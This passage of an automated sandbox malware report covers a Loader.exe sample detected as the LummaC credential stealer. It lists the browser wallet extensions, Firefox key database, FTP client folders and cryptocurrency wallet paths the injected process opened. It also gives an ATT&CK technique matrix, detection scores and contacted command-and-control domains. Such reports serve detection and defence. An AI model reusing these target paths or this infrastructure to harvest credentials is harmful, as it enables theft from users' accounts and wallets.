                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: Yara matchFile source: 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5772, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5772, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		311
                Process Injection                		1
                Masquerading                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Screen Capture                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory331
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)231
                Virtualization/Sandbox Evasion                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin Shares41
                Data from Local System                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                Process Injection                		NTDS231
                Virtualization/Sandbox Evasion                		Distributed Component Object Model2
                Clipboard Data                		114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets11
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials33
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Loader.exe49%VirustotalBrowse
                Loader.exe70%ReversingLabsWin32.Spyware.Lummastealer
                Loader.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\gdi32.dll63%ReversingLabsWin32.Trojan.LummaC

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://community.fastly.steamst0%Avira URL Cloudsafe
                https://lev-tolstoi.com/Sg5h100%Avira URL Cloudmalware
                https://store.steampowered.c0%Avira URL Cloudsafe
                https://lev-tolstoi.com/uo100%Avira URL Cloudmalware
                https://checkout.steampow0%Avira URL Cloudsafe
                https://lev-tolstoi.com/s~100%Avira URL Cloudmalware
                https://lev-tolstoi.com/T100%Avira URL Cloudmalware
                https://community.fastly.st0%Avira URL Cloudsafe
                https://login.steamp0%Avira URL Cloudsafe
                https://community.fastly.steamstatic.co0%Avira URL Cloudsafe
                https://sketchfab.b0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		23.55.153.106
                		truefalse
                  		high
                  lev-tolstoi.com
                  		172.67.157.254
                  		truefalse
                    		high
                    cashfuzysao.buzz
                    		unknown
                    		unknownfalse
                      		high
                      scentniej.buzz
                      		unknown
                      		unknownfalse
                        		high
                        inherineau.buzz
                        		unknown
                        		unknownfalse
                          		high
                          prisonyfork.buzz
                          		unknown
                          		unknownfalse
                            		high
                            ingreem-eilish.biz
                            		unknown
                            		unknowntrue
                              		unknown
                              rebuildeso.buzz
                              		unknown
                              		unknownfalse
                                		high
                                appliacnesot.buzz
                                		unknown
                                		unknownfalse
                                  		high
                                  hummskitnj.buzz
                                  		unknown
                                  		unknownfalse
                                    		high
                                    screwamusresz.buzz
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      scentniej.buzzfalse
                                        		high
                                        https://steamcommunity.com/profiles/76561199724331900false
                                          		high
                                          rebuildeso.buzzfalse
                                            		high
                                            appliacnesot.buzzfalse
                                              		high
                                              screwamusresz.buzzfalse
                                                		high
                                                cashfuzysao.buzzfalse
                                                  		high
                                                  inherineau.buzzfalse
                                                    		high
                                                    https://lev-tolstoi.com/apifalse
                                                      		high
                                                      hummskitnj.buzzfalse
                                                        		high

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://store.steampowered.caspnet_regiis.exe, 00000003.00000002.2243324793.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://steamcommunity.com/?subsection=broadcastsaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.fastly.steamstaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://community.fastly.steamstatic.com/publaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cdn.fastly.aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://steamcommunity.com/linkfilter/?u=aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_naspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.google.com/recaptcaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/profiwaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.valvesoftware.com/legal.htmaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.youtube.comaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.google.comaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://lev-tolstoi.com/Taspnet_regiis.exe, 00000003.00000003.2103505793.000000000354C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englaspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://s.ytimg.com;aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://lev-tolstoi.com/Sg5haspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://steambroadcast-test.akamaizedaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://steam.tv/aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://lev-tolstoi.com/aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243704509.0000000005C00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://lev-tolstoi.com/s~aspnet_regiis.exe, 00000003.00000002.2243704509.0000000005C00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://store.steampowered.com/points/shop/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://sketchfab.comaspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
